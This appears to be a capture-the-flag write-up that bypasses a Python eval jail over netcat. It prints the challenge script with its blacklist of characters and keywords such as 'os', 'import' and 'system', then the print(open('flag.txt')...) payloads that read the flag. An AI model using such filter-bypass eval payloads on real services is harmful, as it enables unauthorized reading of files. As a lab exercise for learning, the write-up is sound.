We have a netcat interface that we can use to send commands. We need to bypass a filter to execute Python code to read the flag in the same folder as the script. I cleaned it up a little:
Copy #!/usr/bin/python3
banner1 = 'banner1'
banner2 = 'banner2'
blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
' ', '-', '!', '[', ']', '*', 'import',
'eval', 'banner', 'echo', 'cat', '%',
'&', '>', '<', '+', '1', '2', '3', '4',
'5', '6', '7', '8', '9', '0', 'b', 's',
'lower', 'upper', 'system', '}', '{' ]
while True:
ans = input('Break me, shake me!\n\n$ ').strip()
if any(char in ans for char in blacklist):
print(f'\n{banner1}\nNaughty naughty..\n')
else:
try:
eval(ans + '()')
print('WHAT WAS THAT?!\n')
except:
print(f"\n{banner2}\nI'm UNBREAKABLE!\n") Our command gets any leading or trailing spaces removed.
Then the blacklist is applied.
If the blacklist did not block it, () is appended to the answer and that gets executed if its valid python code.
Copy $ open('flag.txt','r').read
WHAT WAS THAT?!
Copy $ print(open('flag.txt','r').read)#
<built-in method read of _io.TextIOWrapper object at 0x7f1d4ad1f5e0>
WHAT WAS THAT?! Turns out this outputs the read function itself instead of executing it.
Copy $ print(open('flag.txt','r').read())#
HTB{3v4l_0r_3vuln??}